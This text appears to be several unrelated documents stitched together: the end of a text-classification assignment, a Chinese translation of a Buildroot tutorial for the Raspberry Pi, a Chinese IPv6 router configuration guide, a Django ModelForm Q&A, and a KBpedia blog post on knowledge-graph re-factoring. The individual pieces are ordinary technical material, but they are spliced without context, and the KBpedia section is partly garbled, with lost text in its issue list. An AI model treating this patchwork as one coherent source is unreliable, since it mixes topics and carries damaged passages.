We can also search for neighbors in a vector space with reduced dimension, using either TruncatedSVD (to compute a singular value decomposition) or NMF (to compute a non-negative matrix factorization).
You can use TruncatedSVD in a pipeline, either as the last step (so you need to call transform(X) on the pipeline instead of predict), or in between your vectorizer and your classifier.The transform(X) method will return a matrix where the rows correspond to your data points, and the columns correspond to your reduced-dimension features.So, if you want to get some reduced-dimension representations of texts, you can do:
svd_pipe = Pipeline([ ('word_vec', TfidfVectorizer()), ('svd', TruncatedSVD(8)) ]) svd_pipe.fit(train['text']) text_vectors = svd_pipe.transform(train['text'])
Plot a Seaborn pairplot of the results of projecting the article texts with an 8-dimensional SVD, with the points colored by document class. What do you observe?
Train a k-NN classifier with 5 neighbors on the SVD-transformed article texts. You can do this with a 3-stage pipeline.Report its accuracy on both the training and the test data.
Summarizing Classifier Accuracy (10%)
At this point, you should have 4 different classifiers.
Show the accuracy of your 4 different classifiers on both the training and test data with an appropriate table and plot. Which classifier design performs the best? Which classifier seems to overfit the most in the training process?
Clustering (20%)
So far our machine learning has been supervised: we have the labels. We can also do unsupervised learning, where we learn patterns from the data without labels. One such technique is clustering: putting objects (such as documents) into groups, using only the features in the documents and not using external group labels.
K-means is a simple way of clustering a group of data points into k clusters. KMeans in scikit-learn implements this; after training, its predict() method outputs cluster numbers for data points - this is how you will get the clusters.It’s like the classifier output, except cluster numbers. The most important parameter to KMeans is the number of clusters to find - it cannot do that on its own.It also does not match clusters to classes.
Our goal in this part is to answer the question: if we automatically cluster the news articles, do the clusters match their editor-defined categories?
We are going to explore this by showing the distribution of document categories within each clusters. The resulting chart should be a faceted bar chart: one bar plot for each cluster, in which the x axis is the article category, and the y axis is the number of documents in that cluster that are in that category.
Fit a k-means model with 5 clusters, using TF-IDF vectors, and plot the cluster/category alignment as described above.Do you think the clustering did a good job of finding the categories?
Repeat with 6 clusters. Do you think this clustering does a better or worse job? Explain why, using evidence from the plots (and if you think additional analyses would be useful, include them to support your argument).
For each cluster in the clustering you think did a better job, find the words that are most important for that cluster.The KMeans object, after it has been fit, has a cluster_centers_ field containing a matrix. There is a row for each cluster, and the columns are features (in our case, words); it says where in word-space the middle of that cluster is.What words have the largest values for each cluster?You can get the words with the vectorizer’s get_feature_names() method.You can get a row of the matrix with matrix[row, :], and use that with the feature names to make a series.Do these words make sense in light of the documents in that cluster?
Reflection (10%)
Write 2–3 paragraphs about what you learned from this assignment. Please be specific — I would like you to reflect on particular things you learned about text classification or clustering, or about this data, and not just say general things about learning about text. What surprised you in this project?
Extra Credit (5%)
Use GridSearchCV to simultaneously pick a good number of dimensions for the SVD and a good number of neighbors.You can do this by using it to search for parameters for a pipeline.Does optimizing your SVD improve the resulting classifier's accuracy?
NMF provides another strategy for matrix factorization.Apply it to count vectors (not TF-IDF vectors) as input to k-NN, and grid-search resulting classifier's settings.How does it compare to using SVD for classifying articles?
Time Estimate
Data prep: 1 hour
Classification: 2 hours
Dimensionality reduction: 1 hour
Summarizing Accuracy: 30 minutes
Clustering: 2 hours
Reflection: 30 minutes
|
此文章翻译自ThirtyThreeForty的Mastering Embedded Linux, Part 3: Buildroot。
在本章中,我们正式开始进入实操阶段。我们将从源码编译Linux,并尝试在树莓派上启动。前面的文章中也提到了,本章将会是讨论和教程并重的一章。
本章将会介绍Buildroot,一个高度可定制的嵌入式Linux镜像构建工具。Buildroot很强大,也很容易上手使用。它提供了一系列的自动化脚本,使得镜像构建过程不再需要过多的手工参与,让你可以在编译的时候干其他的工作。
在这篇文章中,我们将:
下载Buildroot并使用6个命令启动构建
在它构建的时候,我们将讨论Buildroot做了哪些自动化工作,并且简要介绍构建的流程
最后,我们将尝试在树莓派上启动我们构建的镜像
这个过程应该是简单且有趣的1,让我们开始吧!
准备工作
在上一章的结尾,我们介绍了本章需要使用到的硬件。我们会使用树莓派作为目标硬件,FT2232作为串口转换器与树莓派通信。不过,如果你不想购买任何硬件的话,你也可以在虚拟机上尝试运行镜像。
不过,无论你使用了什么样的目标硬件,你都还需要满足以下需求:
正在运行Linux的主机工作站。如果你不知道该选择什么Linux发行版,那就用Ubuntu。如果你当前没有运行Linux,那么可以安装一个虚拟机作为替代方案。这篇文章并不会告诉你如何在你的主机或虚拟机上安装Linux,所以你需要事先安装好这些东西。
15GB大小的空闲磁盘空间。我们需要编译整个操作系统,虽然编译出来的产物很小,但是中间过程还是需要不少的磁盘空间。如果你正在使用虚拟机,那么要确保已经分配了足够多的磁盘空间给这台虚拟机。
2~4小时的空闲时间。你需要这么多时间来阅读这篇文章,编译系统,以及测试结果。
一定的Linux知识。不需要太多Linux知识,但如果能知道一些常用的Shell指令最好。
编译 Buildroot
编译 Buildroot 很简单,仅需4步:
安装主机工具
下载Buildroot
配置Buildroot
开始编译
这4步仅需6个指令就能完成,下面会详细介绍它们。
安装主机工具
编译的第一步是安装那些Buildroot没有自带的工具,包括:
Git:虽然Buildroot提供压缩包下载方式,但长远来说使用Git是一个更好的选择
一个编译器:Buildroot需要一个初始编译器编译它自己的编译器
一些杂七杂八的工具:Buildroot需要这些工具来下载和处理代码,你可以在Buildroot的文档上找到这些工具的列表。
screen:给FT2232用的一个串口控制台工具
可以使用下面的命令安装工具。(注意所有命令开头的~$是Shell自带的提示符,不要把这个提示符给复制进去,光复制后面的命令即可。)
~$ sudo apt install -y git build-essential wget cpio unzip rsync bc libncurses5-dev screen
这些工具为Buildroot提供了一个最小环境,Buildroot会使用这些工具构建它自己的工具并编译系统。
(上面这个命令是在Ubuntu下的命令,也是本教程中唯一一个指定发行版的命令。其他的所有命令都是和Buildroot而不是主机操作系统交互。)
下载Buildroot
Buildroot提供了 许多方式下载其源代码,但最方便的方法是使用Git。
使用Git克隆Buildroot:
~$ git clone git://git.buildroot.net/buildroot
Cloning into 'buildroot'...
remote: Enumerating objects: 356009, done.
remote: Counting objects: 100% (356009/356009), done.
remote: Compressing objects: 100% (116215/116215), done.
remote: Total 356009 (delta 248969), reused 342974 (delta 238353)
Receiving objects: 100% (356009/356009), 75.76 MiB | 1.36 MiB/s, done.
Resolving deltas: 100% (248969/248969), done.
~$ cd buildroot/
现在我们就在Buildroot目录中了。我们需要切换到一个特定的Buildroot版本来编译。在本教程中,我们将编译当前最新的2019.11.1版本。(译者:现在最新的是2020.02)
检出到 2019.11.1标签:
~/buildroot$ git checkout 2019.11.1
Note: checking out '2019.11.1'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:
git checkout -b <new-branch-name>
HEAD is now at 57fbebac60 Update for 2019.11.1</new-branch-name>
非常简单对吧。Git在这里告诉我们当前不在一个分支上(“分离头部, detached HEAD”),我们可以忽略这个提示。
配置Buildroot
现在你需要为Buildroot选择一个适合你的硬件的配置。根据你的目标不同,输入的命令略有差异:
目标 命令
树莓派 Zero W make raspberrypi0w_defconfig
树莓派 Zero make raspberrypi0_defconfig
虚拟机 make qemu_x86_64_defconfig
make命令后面的参数是一个配置文件。你可以在configs目录下看到所有的配置文件。我们稍后将会详细解释这件事。
~/buildroot$ make raspberrypi0w_defconfig
Buildroot会打印出所有运行过的命令,所以看上去可能会有些乱。你暂时可以忽略上面所有的输出,只关注最底下的几行。出现下面这几行东西就说明你的配置已经生效了。
#
# configuration written to /home/georgev/buildroot/.config
#
编译
现在我们已经准备好编译整个系统了。Buildroot会帮我们做好剩下的工作,但编译需要一些时间。通常来说,整个编译过程需要大约2~3小时,编译时间和你的工作站运行速度以及网速有关。
准备好了吗?
让我们编译镜像吧!直接运行下面的命令即可2。
~/buildroot$ make
输入这行命令后,你会看到屏幕上有一大堆文字输出,这说明Buildroot正在下载并编译系统。编译完毕后,buildroot会生成一个SD卡镜像供你烧写。
Buildroot是如何运行的
在编译的过程中,我会向你介绍Buildroot各个部分是怎么工作的。
编译流程图
这是Buildroot的编译流程图3:
Buildroot 编译工具链,包括了交叉编译器和用于构建系统工具(绿色部分)
各个软件的源代码(蓝色部分)从互联网上下载
使用Buildroot脚本(灰色部分)解压源代码,打上补丁,配置,编译并安装至目标输出目录,组成目标的根文件系统(root filesystem, rootfs)(紫色部分)
额外的文件,例如设备配置文件,也会复制到目标输出目录
最终,脚本将各个部分组装起来,形成根文件系统。
当然,以上过程也会有例外。某些交叉编译器是直接下载而不是从源代码编译的;有时候厂家提供给你的“板级支持包(Board Support Package, BSP)”已经为你编译好了所有的东西。流程图上的某些步骤会被省略,但大体框架还是一样的。
Buildroot目录树下面的这些目录是非常重要的,你的大多数时间都会花在和它们打交道上。
目录 用途
board/ 支持目标设备的文件和脚本
configs/ 预置的Buildroot编译配置文件,如raspberrypi0w_defconfig
package/ 软件包定义
output/host/ 在主机上运行的构建工具
output/target/ 目标输出目录,用于暂时存放目标二进制
output/images/ 最终文件系统镜像和固件镜像目录
所以,下一个问题是:make这一个神奇的命令是如何知道要构建所有东西的?要回答这个问题,首先我们需要谈论Buildroot软件包的结构。
Buildroot 软件包
Buildroot中的绝大多数东西都是软件包。在Buildroot中,编译脚本是按照“软件包”的形式分组的。
每个软件包都有着自己的配置选项、编译过程以及依赖项目。依赖项目规定了各个软件包的编译顺序,编译过程定义了下载和编译时用的命令,配置选项控制了软件包的编译配置。
理解了软件包的配置,也就不难理解整个构建配置了。
构建配置
将所有软件包的配置集合在一起,我们就得到了构建配置。使用预定义构建配置(defconfig)可以很方便的选择上所有相关的选项。
所以这就是make命令如何知道要构建什么的原理:所有的配置的选项都在我们一开始指定的raspberrypi0w_defconfig文件中提供了6。(GNU Make 会计算依赖树并以正确的顺序构建各个软件包)
选择一个defconfig会将里面的所有配置复制到当前配置文件中(.config文件)。menuconfig工具提供了一个友好的用户界面用于修改配置选项,你可以随意的使用这个工具修改当前配置文件。
需要注意的是.config文件是不会被Git所版本控制的。你需要使用make savedefconfig来将当前配置文件中的配置复制到一个defconfig文件中,而这个文件则会被版本控制。
启动新镜像
说了这么多,让我们来启动Linux吧。
编译过程快要结束时,你可以看到类似于这样的日志:
INFO: vfat(boot.vfat): adding file 'zImage' as 'zImage' ...
INFO: vfat(boot.vfat): cmd: MTOOLS_SKIP_CHECK=1 mcopy -bsp -i '/home/georgev/Code/buildroot-mel/output/images/boot.vfat' '/home/georgev/Code/buildroot-mel/output/images/zImage' '::' (stderr):
INFO: hdimage(sdcard.img): adding partition 'boot' (in MBR) from 'boot.vfat' ...
INFO: hdimage(sdcard.img): adding partition 'rootfs' (in MBR) from 'rootfs.ext4' ...
INFO: hdimage(sdcard.img): writing MBR
上面的日志告诉我们,为树莓派制作的SD卡镜像(sdcard.img)已经制作完毕了。这个镜像是根据位于output/target/的根文件系统构建的,你可以使用ls命令来查看结构7:
~/buildroot$ ls -lh output/target/
total 64K
drwxr-xr-x 2 georgev georgev 4.0K Jan 13 22:01 bin
drwxr-xr-x 4 georgev georgev 4.0K Jan 13 20:48 dev
drwxr-xr-x 5 georgev georgev 4.0K Jan 13 22:01 etc
drwxr-xr-x 3 georgev georgev 4.0K Jan 13 22:01 lib
lrwxrwxrwx 1 georgev georgev 3 Jan 13 21:08 lib32 -> lib
lrwxrwxrwx 1 georgev georgev 11 Jan 13 21:23 linuxrc -> bin/busybox
drwxr-xr-x 2 georgev georgev 4.0K Jan 13 20:48 media
drwxr-xr-x 2 georgev georgev 4.0K Jan 13 20:48 mnt
drwxr-xr-x 2 georgev georgev 4.0K Jan 13 20:48 opt
drwxr-xr-x 2 georgev georgev 4.0K Jan 13 20:48 proc
drwxr-xr-x 2 georgev georgev 4.0K Jan 13 20:48 root
drwxr-xr-x 2 georgev georgev 4.0K Jan 13 20:48 run
drwxr-xr-x 2 georgev georgev 4.0K Jan 13 22:01 sbin
drwxr-xr-x 2 georgev georgev 4.0K Jan 13 20:48 sys
-rw-r--r-- 1 georgev georgev 1.4K Jan 13 21:08 THIS_IS_NOT_YOUR_ROOT_FILESYSTEM
drwxr-xr-x 2 georgev georgev 4.0K Jan 13 20:48 tmp
drwxr-xr-x 6 georgev georgev 4.0K Jan 13 22:01 usr
drwxr-xr-x 3 georgev georgev 4.0K Jan 13 20:48 var
我们也可以再次确认这个镜像位于output/images/目录下:
~/buildroot$ ls -lh output/images/
total 225M
-rw-r--r-- 1 georgev georgev 24K Jan 13 22:01 bcm2708-rpi-zero.dtb
-rw-r--r-- 1 georgev georgev 32M Jan 13 22:01 boot.vfat
-rw-r--r-- 1 georgev georgev 120M Jan 13 22:01 rootfs.ext2
lrwxrwxrwx 1 georgev georgev 11 Jan 13 22:01 rootfs.ext4 -> rootfs.ext2
drwxr-xr-x 3 georgev georgev 4.0K Jan 13 21:28 rpi-firmware
-rw-r--r-- 1 georgev georgev 153M Jan 13 22:01 sdcard.img
-rw-r--r-- 1 georgev georgev 4.8M Jan 13 22:01 zImage
看上去一切正常。现在让我们将这个镜像烧录到树莓派的SD卡中,并将树莓派连接到电脑上吧。
可选步骤:启动虚拟机
如果你正在使用树莓派,那么请跳过这一节。
如果你选择虚拟机作为目标,那么你可以使用这行命令8来启动虚拟机:
~/buildroot$ output/host/bin/qemu-system-x86_64 -M pc -kernel output/images/bzImage -drive file=output/images/rootfs.ext2,if=virtio,format=raw -append rootwait root=/dev/vda -net nic,model=virtio -net user
虚拟机窗口出现则说明启动成功了,接下来请跳过“启动镜像”这一节,那是为树莓派准备的。
额外说明:如何使用dmesg
dmesg是一个Linux小工具,用于显示内核日志。内核会打印出为接入设备分配的名称,所以在调试的时候是很有用的。
基础的用法很简单,只需运行:
$ dmesg -w
-w选项的意思是“watch”,即在显示已有的日志后,一直监视内核的新日志。你可以暂时忽略已有的日志,因为其过于冗长而且没有什么用。运行完这个命令后,你可以插入你的SD卡读卡器,然后你可以见到类似下面的输出:
[163513.147002] mmc0: new ultra high speed SDR50 SDHC card at address aaaa[163513.174253] mmcblk0: mmc0:aaaa SP32G 29.7 GiB[163513.189137] mmcblk0: p1
在这个示例中,SD卡分配了一个名为mmcblk0设备,其含有一个简单的p1分区。所以,这个设备的完整路径是/dev/mmcblk0,分区路径是/dev/mmclbk0p1。根据读卡器类型的不同,这个设备名前面可能会有“sd”的前缀。
当你不想要继续监视日志的时候,你可以按下Ctrl+C来停止监视。
烧录SD卡
将你的SD卡使用读卡器连接到电脑,并使用dmesg获取到它的名称。使用dd命令可以将镜像复制到sd卡中。将下面命令中的/dev/mmcblkX替换为你的SD卡的真实路径。
~/buildroot$ sudo dd if=output/images/sdcard.img of=/dev/mmcblkX bs=1M status=progress
警告:
确保你的of(输出文件)是正确的。如果你错误的选择了你的工作站上的硬盘,
dd命令会将你的硬盘数据完全删除。如果你不确定是否正确,请参考上一节再次确认一遍设备路径。
命令的参数意义如下:
参数 解释
if= Input File,输入文件,将从这个文件里面读取数据
of= Output File,输出文件,将数据写入到这个文件中
bs= Block Size,块大小,一次写入的数据大小
status= 显示一个进度条(有时候可能不起作用)
当这个命令运行完毕后,使用下面的命令确保内核将所有的缓存写入到SD卡中:
~/buildroot$ sync
这个命令运行完毕后,你就可以拔出你的SD卡并插入你的树莓派中了。先不着急启动你的树莓派,我们还有工作要做。(当然,启动了也不会有什么后果)
连接到树莓派的串口调试接口
我们现在需要将FT2232的UART口和树莓派的UART口连接到一起。这是树莓派的接口定义:
因为FT2232不仅是一个UART转换器,所以我们得知道其在UART模式下所用的具体IO。根据FT2232的数据手册,我们可以得到:
对于异步串口(Async Serial),ADBUS0是TXD,ADBUS1是RXD。
将树莓派的UART TXD与FT2232的UART RXD连接在一起,RXD同理。最终我们能得到类似这样的东西:
现在,将你的FT2232连接到你的工作站,使用dmesg找出FT2232的设备名称。名称通常可能是ttyUSB0或ttyUSB1——FT2232有两个通道9。
打开串口
运行 GNU Screen,指定设备为FT2232的设备,并且设置波特率,禁用流控(大多数Linux串口都使用115200的波特率并且没有硬件流控)。
~/buildroot$ sudo screen -fn /dev/ttyUSBX 115200
如果你想退出Screen,你需要先按下Ctrl+a,然后按一下\退出。
启动固件
接通树莓派的电源,此时串口控制台应该会开始打印启动信息:
[ 0.000000] Booting Linux on physical CPU 0x0
[ 0.000000] Linux version 4.19.66 ([email protected]) (gcc version 8.3.0 (Buildroot 2019.11.1)) #1 Tue Jan 14 11:14:59 CST 2020
[ 0.000000] CPU: ARMv6-compatible processor [410fb767] revision 7 (ARMv7), cr=00c5387d
[ 0.000000] CPU: PIPT / VIPT nonaliasing data cache, VIPT nonaliasing instruction cache
[ 0.000000] OF: fdt: Machine model: Raspberry Pi Zero Rev 1.3
[ 0.000000] Memory policy: Data cache writeback
[ 0.000000] cma: Reserved 8 MiB at 0x19000000
[ 0.000000] random: get_random_bytes called from start_kernel+0x90/0x4a4 with crng_init=0
[ 0.000000] Built 1 zonelists, mobility grouping on. Total pages: 104545
[ 0.000000] Kernel command line: coherent_pool=1M bcm2708_fb.fbwidth=720 bcm2708_fb.fbheight=480 bcm2708_fb.fbswap=1 smsc95xx.macaddr=B8:27:EB:6C:5F:E1 vc_mem.mem_base=0x1ec00000 vc_mem.mem_size=0x20000000 root=/dev/mmcblk0p2 rootwait console=tty1 console=ttyAMA0,115200
[ 0.000000] Dentry cache hash table entries: 65536 (order: 6, 262144 bytes)
[ 0.000000] Inode-cache hash table entries: 32768 (order: 5, 131072 bytes)
[ 0.000000] Memory: 397928K/421888K available (6947K kernel code, 635K rwdata, 2080K rodata, 452K init, 796K bss, 15768K reserved, 8192K cma-reserved)
最终,它将会打印出登录提示符:
Welcome to Buildroot!buildroot login:
你可以使用root作为用户名登录,这个账户没有密码。登录后可以尝试使用ls /usr/bin来查看可以运行什么程序。
如果你成功运行到了这步,那么恭喜你!你成功的将源代码编译成了可以启动的镜像。
总结
这是一篇关于Buildroot顶层的教程,Buildroot中还有很多东西在这篇教程中没有提到。但无论如何,这篇教程里面包含了很多信息。
在这篇教程中:
你拥有了所有运行在目标设备上的代码,以及相关的编译工具链。
此过程中的所有软件都是开源的,你使用make将他们编译出来。如果有一天某个东西损坏或你不想要了,你还可以简单的修改它们
所有的工作都是自动化的。
Buildroot使你可以在一个时间仅关注一件事情。你可以使用已有的defconfig,并在上面做自己的修改。
输出根文件系统非常小。
默认输出镜像仅有57MB,且大部分都是可以关闭的内核模块。Buildroot的“小体积镜像”的哲学使你可以在有限的空间中增加更多的功能,你甚至可以编译一个大小为4MB的镜像!
扩展阅读
以下的书籍是和本章内容密切相关的:
How Linux Works, 第二版10讲述了关于Linux的很多主题。其与桌面、服务器以及嵌入式Linux都有关。它涵盖了从基础的命令行到高级的X11和DBus系统的信息。如果你想知道这些东西具体是怎么工作的,这本书能够帮助到你。
Bootlin 的 Buildroot 培训课程,是非营利性嵌入式Linux开发组织Bootlin提供的。你可以付费参与这项课程,或者仅使用他们的教学材料。
Buildroot 用户手册,提供了更多如何使用Buildroot的信息。这里面详细的解释了构建系统的部分领域,以及教你如何编写一个新的软件包。当然,这份东西是使用手册而不是教程,所以看上去可能会有些冗长。建议在深入Buildroot之前详细阅读这份材料。
接下来……
在下一章中,我们将会为我们刚刚编译好的系统添加一些新的功能。这会需要阅读一些文档,并用我之前演示过的menuconfig命令来自定义配置。
我们会修改配置,重新编译并测试新的修改(重新编译在Buildroot中仅需几分钟)。这就是制作固件最常用的步骤循环。
注释
如果你遇到了问题:
尝试谷歌你的错误信息,并在后面加上“Buildroot”的关键字。通常来说都会有人遇到过类似的问题,可以参考他们的解决方案来解决。嵌入式系统就是这样,充满着令人烦恼的问题。而耐心和较好的调试技能则是解决这些问题的关键。
关于虚拟机的问题:
如果你正在虚拟机中运行Buildroot,请确保你的FT2232和SD卡是直通到你的虚拟机内部的。同时,记得不要给虚拟机分配太少资源,不然编译时间会变得非常长。
有趣的定义因人而异。 ↩︎
如果你的工作站还需要运行其他东西,你可以使用 nice make命令,这样make指令就会以较低的优先级运行 ↩︎
虽然写的是Buildroot,但这一流程也适用于所有的嵌入式Linux发行版。 ↩︎
为主机编译的软件包的配置文件是Config.host.in ↩︎
Kconfig原本是Linux内核开发者用于管理内核中广泛的配置项目而设计的。Buildroot使用的是类似的结构,所以也可以使用Kconfig。 ↩︎
这句话是不正确的。实际上,只有非默认的配置项目才会存储在defconfig里面。但因为默认配置已经存储在其他地方了,所以我们可以认为所有的配置都存在了defconfig内。 ↩︎
Buildroot在output/target目录下添加了THIS_IS_NOT_YOUR_ROOT_FILESYSTEM文件,告诉你这并不是根文件系统。然而,这确实是根文件系统,只不过相对于真正的根文件系统还差几个步骤(如创建某些特殊文件)。 ↩︎
想知道这行奇怪的命令是怎么来的?看 boards/qemu/x86_64/readme.txt文件就知道了。 ↩︎
如果你正在使用的是FT232(不是2232),那么这就只有一个USB通道。我们暂时不会使用第二个USB通道。 ↩︎
这个链接是一个带有推广的链接,这可以帮助我构建更好的嵌入式系统(译者:是原作者的) ↩︎
|
目前国内很多小区已经支持IPv6,同时配置了DHCPv6-PD,采用Ubnt路由器的话可以通过很简单的方式启用,方便家里面的设备连接。
进入Config Tree
interfaces / ethernet / eth0 / pppoe / 0 / dhcpv6-pd / pd
add:0
更新
interfaces / ethernet / eth0 / pppoe / 0 / dhcpv6-pd / pd / 0
prefix-length :/60
interfaces / ethernet / eth0 / pppoe / 0 / dhcpv6-pd / pd / 0 / interface
interface switch0
更新列表
interfaces / ethernet / eth0 / pppoe / 0 / dhcpv6-pd / pd / 0 / interface / switch0
host-address ::1
prefix-id :1
service dhcpv6-stateless
interfaces / ethernet / eth0 / pppoe / 0 / ipv6 / address,点+
interfaces / ethernet / eth0 / pppoe / 0 / ipv6 / enable,点+
以上设置完成后Preview即可生效,另外根据实际使用中,发现我这里移动商分发的IPv6 DNS服务器经常抽风,导致打开网页最开始会很卡。可以在IPv6里面启用no-dns选项即可。
如果你的运营商给你的地址已经是/64,没有DHCPv6-PD,那么可以通过IPv6 NDP解决,我之前在OpenWRT实现过,我这里外网网卡是eth0,内网是br-lan,先安装ndppd
opkg update && opkg install ndppd
看一下我的Global IPv6地址:
root@OpenWrt:/etc# ifconfig eth0
eth0 Link encap:Ethernet HWaddr 8C:21:0A:A6:94:B3
inet addr:121.48.171.138 Bcast:121.48.171.255 Mask:255.255.255.128
inet6 addr: 2001:250:2000:7520:8e21:aff:fea6:94b3/64 Scope:Global
inet6 addr: fe80::8e21:aff:fea6:94b3/64 Scope:Link
UP BROADCAST RUNNING ALLMULTI MULTICAST MTU:1500 Metric:1
RX packets:517397 errors:0 dropped:450 overruns:0 frame:0
TX packets:777032 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:177017984 (168.8 MiB) TX bytes:688621714 (656.7 MiB)
Interrupt:4
是2001:250:2000:7520:8e21:aff:fea6:94b3/64,因为是/64,所以无法继续划分子网,就要使用刚才说的邻居发现协议。
然后给内网网卡br-lan设置与eth0的地址前64位相同,后64位不同的IPv6地址,设置时前缀长度要大于64:
ip -6 addr add 2001:250:2000:7520:1::1/80 dev br-lan
修改/etc/ndppd.conf
proxy eth0{
router yes
timeout 500
ttl 30000
rule 2001:250:2000:7520:1::/80 {
auto
}
}
然后运行ndppd:/etc/init.d/ndppd start,这样就配置好了。但是这个时候还不能客户端自动获得IP,radvd配置只能前缀为64,所以还需要dhcpv6 server:
opkg install radvd
opkg install wide-dhcpv6-server
配置/etc/config/radvd:
config interface
option interface 'lan'
option AdvSendAdvert 1
option AdvManagedFlag 1
option AdvOtherConfigFlag 1
list client ''
config prefix
option interface 'lan'
# If not specified, a non-link-local prefix of the interface is used
list prefix ''
option AdvOnLink 1
option AdvAutonomous 1
option AdvRouterAddr 0
配置/etc/config/dhcp6s,enabled设置为1
配置/etc/dhcp6s.conf
interface br-lan {
address-pool pool1 86400;
};
pool pool1 {
range 2001:250:2000:7520:1::200 to 2001:250:2000:7520:1::300 ;
};
启动radvd和dhcpv6 server:
/etc/init.d/radvd start
/etc/init.d/dhcp6s start
注意顺序,如果遇到错误,可以:
/etc/init.d/radvd restart
/etc/init.d/ndppd restart
这样我们就配置好了IPv6的邻居发现协议和IP地址的分配,这个时候连上路由器的客户端已经可以自动获得IPv4和IPv6的地址并无障碍访问IPv4和IPv6的网络了:
本地Ping Google IPv6:
MartiandeMacBook-Pro:~ MartianZ$ ping6 ipv6.google.com
PING6(56=40+8+8 bytes) 2001:250:2000:7520:1::100 --> 2404:6800:4008:c01::68
16 bytes from 2404:6800:4008:c01::68, icmp_seq=0 hlim=46 time=110.295 ms
16 bytes from 2404:6800:4008:c01::68, icmp_seq=1 hlim=46 time=113.267 ms
16 bytes from 2404:6800:4008:c01::68, icmp_seq=3 hlim=46 time=109.890 ms
^C
--- ipv6.l.google.com ping6 statistics ---
4 packets transmitted, 3 packets received, 25.0% packet loss
round-trip min/avg/max/std-dev = 109.890/111.151/113.267/1.506 ms
|
Question:
class SomeModel(models.Model): text = models.TextField() ip = models.IPAddressField() created_on = models.DateTimeField() updated_on = models.DateTimeField()
Say I have that as a model, what if I wanted to only display 'text' field widget for the user to submit data, but I obviously wouldn't want the user to see the widgets for ip,created_on, updated_on to be changed. Yes I know I can add it as a hidden field for the form, but that's not what I'm looking for.
I'm more wondering how can I not render those fields at all when rendering my form, and just dynamically populating the fields when a form is posted and pass form validation? I'm guessing to somehow override the blank values of ip,created_on,updated_on while the form is being cleaned/validated. I know how to do this in the view by using request.POST.copy and injected my values, but I'd like to know if it's possible in models or forms.
Solution:1
Two things:
First ModelForms:
Class SomeModelForm(ModelForm): class Meta: exclude = ['ip','created_on', 'updated_on']
Two Model Fields API:
class SomeModel(models.Model): text = models.TextField() ip = models.IPAddressField() created_on = models.DateTimeField(auto_now_add=True) updated_on = models.DateTimeField(auto_now=True)
Three:
For ip, i think you should to that in your views.
Note:If u also have question or solution just comment us below or mail us on toontricks1994@gmail.com
|
Bringing Home the Lessons to Date with KBpedia v 3.00
Today’s installment in our Cooking with Python and KBpedia series is a doozy. Not only are we wrapping up perhaps the most important part of our series — building KBpedia from scratch — but we are also applying the full roundtrip software in our cowpoke Python package to a major re-factoring of KBpedia itself. This re-factoring will lead to the next release of KBpedia v. 3.00.
This re-factoring and new release was NOT part of the original plan for this
CWPKseries. Today’s current efforts were the result of issues we have discovered in the current version 2.50 of KBpedia, the version with which we began this series. The very process we have gone through in developing thecowpokesoftware to date has surfaced these problems. The problems have been there and perhaps part of KBpedia for some time, but our prior build routines were such that these issues were not apparent. By virtue of different steps and different purposes, we have now seen these things, and now have the extract and build procedures to address them.
It turns out the seven or so problems so identified provide a ‘perfect‘ (in the sense of ‘storm‘) case study for why a roundtrip capability makes sense and how it may be applied. Without further ado, let’s begin.
Summary of the Problem Issues
The cowpoke Python package as we have used to date has surfaced seven types of issues with KBpedia, v. 250, the basis with which we started this CWPK series. Our starting build files for this series are ones extracted from the current public v 250 version. About half of the issues are in the KBpedia knowledge graph, but had remained hidden given the nuances of our prior Clojure build routines. The other half of the issues relate to our new use of Python and owlready2.
These seven issues, with some background explanation, are:
Remove hyphens – in our prior build routines with Clojure, that language has a style that favors dashes (or hyphens) when conjoining words in a label identifier. Python is not hyphen-friendly. While we have not seen issues when working directly with the owlready2 package, there are some Python functions that burp with hyphenated KBpedia identifiers:
print(rc.Chemistry-Topic)
---------------------------------------------------------------------------
NameError Traceback (most recent call last)
<ipython-input-1-5566a42d12b4> in <module>
----> 1 print(rc.Chemistry-Topic)
NameError: name 'rc' is not defined
cowpokeor its knowledge graphs.
Ensure the
kko.superClassOfproperty is moved to anAnnotationProperty. When we want to use the concept of superclass as an object property, we can now use the built-in owlready2 superclass.
Remove OpenCyc href’s – part of KBpedia’s heritage comes from the open-source version of the Cyc ontology, including many initial concept definitions. OCyc distribution and support was ceased in 2017, though the ontology is still referenceable online. Given the receding usefulness of OCyc, we want to remove all of the internal URI references in definitions within KBpedia.
Remove duplicates – one nice aspect of the owlready2 engine is its identification of circular references, but gracefully proceeding with only a warning. Our new build routines have surfaced about ten of these circularities in KBpedia v 250. Two of these,
Person←→HomoSapiens, and a second,God←→Diety, are intended design decisions by us as editors of KBpedia. The other instances, however, are unintended, and ones we want to resolve. We need to remove these.
Remove the SuperType concept and move it to an annotation property – besides being one of the duplicates (see
(4)above), our adoption of Charles Sanders Peirce‘s universal categories in the KBpedia Knowledge Ontology (KKO) has supplanted the ‘SuperType’ nomenclature withGenerals.
Correct
domainandrangeassignments – our internal specifications had nearly completedomainandrangeassignments for version 2.50, but apparently during processing were not properly loaded. The fact they were not completely assigned in the public release was missed, and needs to be corrected.
Remove trailing spaces in the
prefLabelsfor properties – the preferred labels for virtually all of the properties in version 250 had trailing spaces, which never were apparent in listings or user interfaces, but did become evident once the labels were parsed for roundtripping.
The latter four problems ((4), (5), (6), (7) ) were prior to cowpoke, having been issues in KBpedia v 250 at time of release. Processing steps and other different aspects of how the builds are handled in Python made these issues much more evident.
The Plan of Attack
Some of these issues make sense to address prior to others. In looking across these needed changes, here is what emerged as the logical plan of attack:
A. Make KKO changes first ((2), (4), and (5))
Since the build process always involves a pre-built KKO knowledge graph, it is the logical first focus if any changes involve it. Three of the seven issues do so, and efforts can not proceed until these are changed. With respect to (5), we will retain the idea of ‘SuperType’ as the root node of an typology, and designate the 80 or such KKO concepts that operate as such with an annotation property. To prevent confusion with Generals, we will also remove the SuperType concept.
B. Make bulk, flat-file changes ((1), (3), (6), (7))
This step in the plan confirms why it is important to have a design with roundtripping and the ability to make bulk changes to input files via spreadsheets. Mass changes involving many hundreds or thousands of records are not feasible with a manually edited knowledge graph. (I know, not necessarily common, but it does arise as this case shows.) It also makes it hard, if not close to impossible, to make substantial modifications or additions to an existing knowledge graph in order to tailor it for your own domain purposes, the reason why we began this CWPK series in the first place. Addressing the four (1), (3), (6), and (7) problem areas will take the longest share of time to create the new version.
